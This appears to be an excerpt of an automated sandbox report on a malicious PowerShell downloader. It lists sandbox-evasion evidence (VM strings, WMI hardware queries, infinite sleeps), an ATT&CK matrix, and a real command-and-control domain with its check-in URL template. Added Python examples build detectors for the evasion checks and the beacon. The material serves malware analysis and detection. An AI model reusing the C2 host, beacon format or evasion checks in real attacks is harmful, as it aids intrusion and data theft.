Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbGC source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbllu8w source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC35D2A5 pushad ; iretd 0_2_00007FFAAC35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC474FA5 push edi; ret 0_2_00007FFAAC474FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC47E3CF push eax; iretd 0_2_00007FFAAC47E3E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC47CBDA pushad ; retf 0_2_00007FFAAC47CBDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC6CC3B4 pushad ; ret 0_2_00007FFAAC6CC3B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC6CC3AC pushad ; retn 0000h 0_2_00007FFAAC6CC3AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC6CCBE4 pushfd ; retf 0_2_00007FFAAC6CCBE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC6CF86B push eax; iretd 0_2_00007FFAAC6CFB69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAC6E5170 pushad ; ret 0_2_00007FFAAC6E5171

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7632
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3308 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1431782162.00000235E93FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine>
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
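The WMI queries and the thread delay above are the evidence behind the report's "Queries sensitive video device information", "Queries memory information" and "Contains long sleeps" signatures. One check worth making on the delay value: 922337203685477 ms is exactly Int64.MaxValue / 10000, which is .NET's TimeSpan.MaxValue expressed in milliseconds, so the thread was parked with an infinite timeout rather than a finite timed sleep. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that scores behaviour lines of this shape for sandbox awareness. The sample lines are constructed from the entries above; the WMI classes beyond Win32_VideoController and Win32_CacheMemory are an assumption about what comparable loaders query, and the VM string markers other than "VMware" and "IsVirtualMachine" are likewise assumed.

```python
import re
from dataclasses import dataclass, field

# Int64.MaxValue ticks (100 ns units) expressed in milliseconds: this is
# .NET's TimeSpan.MaxValue. A sandbox "delay time" equal to it means an
# infinite wait, not a timed sleep.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477

# Threshold the report itself uses for "Contains long sleeps (>= 3 min)".
LONG_SLEEP_MS = 3 * 60 * 1000

# WMI classes the sample queried (first two, from the report) plus, as an
# assumption, classes commonly queried to fingerprint a hypervisor.
VM_FINGERPRINT_CLASSES = {
    "win32_videocontroller",   # GPU name reveals "VMware SVGA", "Hyper-V", ...
    "win32_cachememory",       # cache topology differs on virtual hardware
    "win32_computersystem",    # assumption: Manufacturer "VMware, Inc."
    "win32_bios",              # assumption: SerialNumber "VMware-..."
    "win32_diskdrive",         # assumption: Model "VMware Virtual disk"
}

# "vmware" and "isvirtualmachine" are from the report; the rest are assumed.
# "Hyper-V" is deliberately not a marker: Windows' own mswsock.dll carries the
# "Hyper-V RAW" provider name, which is what the report's Hyper-V hit is.
VM_MARKERS = ("vmware", "isvirtualmachine", "virtualbox", "vbox", "qemu")

WMI_RE = re.compile(r"ExecQuery\s*-\s*(?P<ns>[\w\\]+)\s*:\s*(?P<q>select .+)$", re.I)
FROM_RE = re.compile(r"\bfrom\s+(?P<cls>\w+)", re.I)
DELAY_RE = re.compile(r"delay time:\s*(?P<ms>\d+)")
STRING_RE = re.compile(r"Binary or memory string:\s*(?P<s>.+)$")


@dataclass
class EvasionFindings:
    wmi_classes: list = field(default_factory=list)
    infinite_waits: int = 0
    long_sleeps_ms: list = field(default_factory=list)
    vm_strings: list = field(default_factory=list)

    def is_sandbox_aware(self) -> bool:
        """Heuristic: a fingerprinting query AND (a stall or a VM string)."""
        return bool(self.wmi_classes) and (
            self.infinite_waits > 0 or bool(self.long_sleeps_ms) or bool(self.vm_strings)
        )


def classify_delay(ms: int) -> str:
    """Bucket a sandbox-reported delay: 'infinite', 'long' (>= 3 min) or 'short'."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def analyse(lines) -> EvasionFindings:
    """Walk behaviour lines in the report's format and collect evasion evidence."""
    f = EvasionFindings()
    for line in lines:
        m = WMI_RE.search(line)
        if m:
            c = FROM_RE.search(m["q"])
            if c and c["cls"].lower() in VM_FINGERPRINT_CLASSES:
                f.wmi_classes.append(c["cls"])
            continue
        m = DELAY_RE.search(line)
        if m:
            kind = classify_delay(int(m["ms"]))
            if kind == "infinite":
                f.infinite_waits += 1
            elif kind == "long":
                f.long_sleeps_ms.append(int(m["ms"]))
            continue
        m = STRING_RE.search(line)
        if m and any(k in m["s"].lower() for k in VM_MARKERS):
            f.vm_strings.append(m["s"].strip())
    return f


# Constructed from the report's own entries (paths shortened to the image name).
SAMPLE_LINES = [
    "Source: powershell.exe WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : select * from Win32_CacheMemory",
    "Source: powershell.exe WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : select * from Win32_VideoController",
    "Source: powershell.exe Thread delayed: delay time: 922337203685477",
    "Source: powershell.exe Binary or memory string: IsVirtualMachine",
    "Source: powershell.exe Binary or memory string: Hyper-V RAW%SystemRoot%\\system32\\mswsock.dll?",
]

if __name__ == "__main__":
    findings = analyse(SAMPLE_LINES)
    print(findings)
    print("sandbox-aware:", findings.is_sandbox_aware())
```

The Hyper-V line is intentionally left out of the markers so that the example does not count a benign Windows string as evidence; a real triage would pair each string hit with the dump it came from (here a heap dump for the VMware strings versus a low-address private mapping for the mswsock string) before crediting it.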
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Mitre Att&ck Matrix (a number in parentheses is the count of matched signatures for that technique; entries without a number are unpopulated matrix cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (121); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection

Source | Detection | Scanner
download.ps1 | 3% | ReversingLabs
No Antivirus matches in the remaining tables (dropped files, unpacked PE files, domains, URLs)
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.181.132 | true | false | - | high
cmacnnkfbhlcncm.top | 45.61.136.138 | true | false | - | high
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 | false | - | unknown
http://www.google.com/ | false | - | high
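The contacted C2 URL above, read together with the unresolved template http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527 that the report recovered from process memory, gives the check-in shape: a plain-HTTP request to a .php page carrying exactly three parameters, id (the victim's computer name), key (a numeric value) and the constant s=527. The hostname and script name live in variables, so a hunt keyed on the domain alone would miss a rotated host. The Python below is an added example for proxy-log hunting on that shape, not code from the report or from the sample; the log lines are constructed, and the hosts in them other than cmacnnkfbhlcncm.top and www.google.com are placeholders.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit, parse_qs

# Check-in shape from the report:
#   http://<host>/<name>.php?id=$env:computername&key=<value>&s=527
# Observed instance:
#   http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
BEACON_CONST_S = "527"
KNOWN_C2_HOSTS = {"cmacnnkfbhlcncm.top"}   # from the report's domain table


@dataclass(frozen=True)
class Beacon:
    host: str
    path: str
    computer_name: str   # the id= parameter
    key: str             # the key= parameter, opaque numeric value


def parse_beacon(url: str):
    """Return a Beacon if url matches the check-in shape, otherwise None."""
    u = urlsplit(url)
    if u.scheme != "http" or not u.path.lower().endswith(".php"):
        return None
    q = parse_qs(u.query, keep_blank_values=True)
    # Exactly the three parameters, each given once: extra or missing
    # parameters are a different request, not this beacon.
    if set(q) != {"id", "key", "s"} or any(len(v) != 1 for v in q.values()):
        return None
    if q["s"][0] != BEACON_CONST_S or not q["key"][0].isdigit():
        return None
    return Beacon(u.hostname or "", u.path, q["id"][0], q["key"][0])


def scan_proxy_log(lines):
    """Return (line_no, beacon, known_host) for each line carrying a matching URL.

    known_host is False for a new host that only matches on shape; that is
    the case a domain-only indicator would miss.
    """
    url_re = re.compile(r"https?://\S+")
    hits = []
    for n, line in enumerate(lines, 1):
        for url in url_re.findall(line):
            b = parse_beacon(url)
            if b:
                hits.append((n, b, b.host in KNOWN_C2_HOSTS))
    return hits


# Constructed proxy log; line 2 is the report's observed URL, lines 3 and 4
# use placeholder hosts (line 3 has an extra parameter and must not match).
SAMPLE_PROXY_LOG = [
    "2024-12-20T16:35:01Z 10.0.0.5 GET http://www.google.com/ 200",
    "2024-12-20T16:35:02Z 10.0.0.5 GET http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 200",
    "2024-12-20T16:35:03Z 10.0.0.5 GET http://example.invalid/index.php?id=1&key=2&s=527&x=3 404",
    "2024-12-20T16:35:04Z 10.0.0.5 GET http://other.invalid/x.php?id=HOST-7&key=999&s=527 200",
]

if __name__ == "__main__":
    for line_no, beacon, known in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(line_no, beacon, "known C2 host" if known else "shape match only")
```

The Google request on line 1 is the connectivity probe the report flags as "Queries Google from non browser process on port 80"; it does not match the beacon shape and is not reported, which is the intended behaviour, since that request is only meaningful when correlated with the process that made it.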
URLs found in process memory (no antivirus detection for any entry)

Name | Source | Malicious | Reputation
http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527 | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://crl.microsoft | powershell.exe, 00000000.00000002.1430090401.00000235E9190000.00000004.00000020.00020000.00000000.sdmp | false | high
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schema.org/WebPage | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://0.google.com/ | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schema.org/WebPageX | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.microsoft.e | powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.google.com | powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngX | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://apis.google.com | powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.microsoft.c | powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2 | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp | false | high
https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.microsoft.i | powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://0.google | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/url?q=https://blog.google/products/gemin | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://cmacnnkfbhlcncm.top | powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gif | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://0.google. | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://0.google.com/ | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/logos/doodles/2024/year | powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmp | false | high
